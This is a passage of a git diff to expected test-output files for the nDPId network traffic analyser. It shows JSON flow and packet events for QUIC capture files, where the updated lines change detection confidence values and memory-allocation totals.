Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434806,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434678,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434524,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434680,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434656,"flow_last_seen":1603816435111,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434729,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434507,"flow_last_seen":1603816444490,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434765,"flow_last_seen":1603816435194,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434648,"flow_last_seen":1603816434782,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":643,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00574{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","packets-captured":246,"packets-processed":246,"total-skipped-flows":0,"total-l4-payload-len":231120,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":77,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":77,"total-idle-flows":77,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":400,"global_ts_msec":1603816444721} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 246/246 @@ -406,9 +406,9 @@ ~~ total active/idle flows...: 77/77 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6596977 bytes -~~ total memory freed........: 6596977 bytes -~~ total allocations/frees...: 119993/119993 +~~ total memory allocated....: 6730611 bytes +~~ total memory freed........: 6730611 bytes +~~ total allocations/frees...: 122755/122755 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 2165 chars diff --git a/test/results/quic_q39.pcap.out b/test/results/quic_q39.pcap.out index 6008f6eff..407fab181 100644 --- a/test/results/quic_q39.pcap.out +++ b/test/results/quic_q39.pcap.out @@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1509098995610} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1509098995610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1509098995610,"pkt":"AAAAPJ7rSEb7OSWDCABFAAVipylAAD8RBjiq2BDRFZ2345bcAbsFTtxhDeca1dd1bE1NUTAzOQFpm58AnJnQaHUqfgGgAQQAQ0hMTxsAAABQQUQA1AEAAFNOSQDhAQAAU1RLABcCAABWRVIAGwIAAENDUwArAgAATk9OQ0sCAABNU1BDTwIAAEFFQURTAgAAVUFJRIACAABTQ0lEkAIAAFRDSUSUAgAAUERNRJgCAABTTUhMnAIAAElDU0ygAgAAQ1RJTagCAABOT05QyAIAAFBVQlPoAgAATUlEU+wCAABTQ0xT8AIAAEtFWFP0AgAAWExDVPwCAABDU0NU\/AIAAENPUFT8AgAAQ0NSVBQDAABJUlRUGAMAAENGQ1ccAwAAU0ZDVyADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1zLnlvdXR1YmUuY29tHmY9ku1OY40wxAcfyyHFWACuKRu9GR6V2xdJs\/1DZWDRgILbvi6YPymdOys8LmRShvdEmFTSUTAzOQHogWCSkhrofu2AhqIVgpFZ8wXyMDAwMDAwMDBOGwyq+nKlq\/7gyjM9fK1HfmcRm2QAAABBRVNHY29tLmdvb2dsZS5hbmRyb2lkLnlvdXR1YmUgQ3JvbmV0LzYzLjAuMzIyMy43EbUkNcc61MtqjsJrlOUgFgAAAABYNTA5AQAAAB4AAADyBfNZAAAAAJSFXrmNCzW2XCwCM6DbC32c2YfxELPjjStDUbaq7wmHTyY4LQBCW\/iNJqUlz2Wd46tERlhzvdEC41udof7lNxBkAAAAAQAAAEMyNTVDwyMTjfiB70PDIxON+IHvmpHtbxwAgQ5AC3uQqa5564NqFQAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.youtube.com","user_agent":"com.google.android.youtube Cronet\/63.0.3223.7"}} +00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1509098995610,"flow_last_seen":1509098995610,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1509098995610,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"s.youtube.com","user_agent":"com.google.android.youtube Cronet\/63.0.3223.7"}} 01979{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1509098995619,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1174,"pkt_l4_len":1140,"thread_ts_msec":1509098995619,"pkt":"AAAAPJ7rSEb7OSWDCABFAASIpypAAD8RBxGq2BDRFZ2345bcAbsEdFQcDeca1dd1bE1NUTAzOQJfXHZ4r4NHY5hNEdjLP+5ayCAfN4aRrJwcGbvr9Ig30\/shURCI87o6EE5x2r0qaxNPy9ijcArYvwm83T\/uUNOwvPrQL1kQ63P7NcdMjvNaDrlFf0DGfuOc7NBPTTXBkaePu98lEtAf3wsOApXg5IhtfmWdfKrgEpCXWFWsxttw6C4\/lCwJqkUGaOjHW5OhnY9r8qCDBdkX4XN\/4WmFW6nWq\/XYAKSy+w3zKPd0+LJKlxsYwrzgGV2rjQwmb93iv1FFvCzNy4lqNoUoMblenytDJV5TJvGYH4s+\/7AX7HDhbJj+lIeaRA3g7dV3H3kgoU\/SpbsdOzy0YVY6Bp9yZermraiyHURn7bAotygD2Vp7YwNcdNEG9BU3funEay5GDjyBK1j66ZDJgNXirLZjzse1+VcJnT0WzMubicwvU30jDw+McSt9Bti6\/gP9FAz9\/lD31IeL8vackSc4lx75mviO5HS6BA\/NqsjQ9B8m4Ji2diYR80xUpIbgdFQiU+oifhm6+LGlaffXf5zfdWBFidIfld\/b7JT3SCK0xn1oi2TKxI8Oroqc4ijms7JGelhl0fef2CpmP0WCIT2YgyU6YwvWa1W7lII+N1ZbTeUAByGqF1QhTf5cSKd79GJRi+dbNY7B3Wj4KJv9v8GAF7TKwPiEZdDEpbOPHL\/FjvVpM04y5hU8HR+06oyFgTK1\/6hdbKNXNH9cJjr2nmUmezntPWc2AFfXM+e\/7E1fv7zcT4Kq1YOLXr9\/RjJvDNQoj81czTWLgfREm6KUrj\/r6fSbFJFnhuScfBlR9k2Pc7b3lIEZb0KXGhxHCyB1J7D8gUoqDhJYFGV+VkGVNhJpozvYPJ8ykH\/Y41HD8nsSDL9iDj9URAxCKHefDlX7Pwz6OhBfkcIZAyY3zG\/w9rr4x0Pl7U6qcsdZ1MBpDJ9qjugA+Tt8C4JpvLxNAR0kx92LyFnt3BYr58WDPwTbktI01oxzKDO5QfY46azjmnqJ+Or2LI93bDxwCMYKsLGAmehhGKZad4Iy8CQig4MBQDG0NMhHKAI6+BaplljmUnDnEalyg57\/03tWWLR4CQIYoKQ9N\/\/fDmFtkFJjraB0A767qxG7Cy8Linc3qzCa86538v6kM371bSCg\/XlL+EWzVEgq8MNOp+Kf2xPBIqWXFiVMGJ1GcpQwm6iQItRpY+85J5+RUK5X+3OW5ex3EYIjJUr+g2x3sFkDiuAsaRHgrjj6WnNpOZnghw1uaYp+E3H8VPrRSwSKqch7lieJx+ojtBtD\/W9etVSxGJeGD7lz+4wIhuht4d\/jcmgefkRDKcrraaR9azCKs\/kbJ\/PpVxbRsVvTZyAXgG+ABf\/0Dt+UshFkLro\/tuKww4FrErwElInQ+88Azyk3w8tcu1AYrDqSPj2BvjSRVwl0PO7TtbVWqgcuYET3exljbs22Rr5eyEoiPXhNZMDC79zLn441b43FrUKvwSHTJR\/j33VYKbaP4oVCvb26Vw=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1509098995647,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1509098995647,"pkt":"AAAAPJ7rSEb7OSWDCABFAAA\/AABAADgRuYQVnbfjqtgQ0QG7ltwAKyQ\/COca1dd1bE1NATKbKH1UbNEn\/TIU5EABJEsBAQAAAAANBgA="} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1509098995610,"flow_last_seen":1509099044559,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":21651,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1509099044559,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1509098995610,"flow_last_seen":1509099044559,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":21651,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1509099044559,"l3_proto":"ip4","src_ip":"170.216.16.209","dst_ip":"21.157.183.227","src_port":38620,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":60,"source":"quic_q39.pcap","alias":"nDPId-test","packets-captured":60,"packets-processed":60,"total-skipped-flows":0,"total-l4-payload-len":21651,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1509099044559} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 60/60 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871229 bytes -~~ total memory freed........: 5871229 bytes -~~ total allocations/frees...: 118175/118175 +~~ total memory allocated....: 6004863 bytes +~~ total memory freed........: 6004863 bytes +~~ total allocations/frees...: 120937/120937 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2247 chars diff --git a/test/results/quic_q43.pcap.out b/test/results/quic_q43.pcap.out index a81bd27cc..390fa897e 100644 --- a/test/results/quic_q43.pcap.out +++ b/test/results/quic_q43.pcap.out @@ -2,9 +2,9 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388060203} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388060203,"flow_last_seen":1592388060203,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388060203,"l3_proto":"ip4","src_ip":"51.120.20.202","dst_ip":"72.119.217.29","src_port":49241,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02242{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q43.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388060203,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1592388060203,"pkt":"AAAAAAAAAA0A1ZJ\/CABFAAVitYFAAD8RFzMzeBTKSHfZHcBZAbsFTg3gDeg8d72PiRX5UTA0MwHUpsx5z1djkhIB1MqgAQQAQ0hMTxgAAABQQUQAKAIAAFNOSQA2AgAAU1RLAGwCAABWRVIAcAIAAENDUwCAAgAATk9OQ6ACAABBRUFEpAIAAFNDSUS0AgAAVENJRLgCAABQRE1EvAIAAFNNSEzAAgAASUNTTMQCAABOT05Q5AIAAFBVQlMEAwAATUlEUwgDAABTQ0xTDAMAAEtFWFMQAwAAWExDVBgDAABDU0NUGAMAAENPUFQcAwAAQ0NSVCwDAABJUlRUMAMAAENGQ1c0AwAAU0ZDVzgDAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1kbnMuZ29vZ2xlLmNvbR8ykEILcj\/tFGrck4XfPyIJIy1Wp2EOyj96Sbv5OxbQ7GtzdqXVHstRevTu5j9sOKKoV3MEbVEwNDMB6IFgkpIa6H7tgIaiFYKRXuiYTDAwMDAwMDAwL8w4xnPBiaheNE18yX+i9poR99hBRVNHfnKffIxl9aDtAhVkrBteYAAAAABYNTA5AQAAAB4AAADs\/0Yi1mMvJ+MeFLVM06sFxTPtG7icgHbJd6FPguzZ5DspSAr1qmJOAogGqdfyO9QJ05Fvsk1n4Zg7QCWE0DkiZAAAAAEAAABDMjU1W+x30vZEmVNOU1RQW+x30vZEmVNgMsuSoEFN3\/mAAgAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 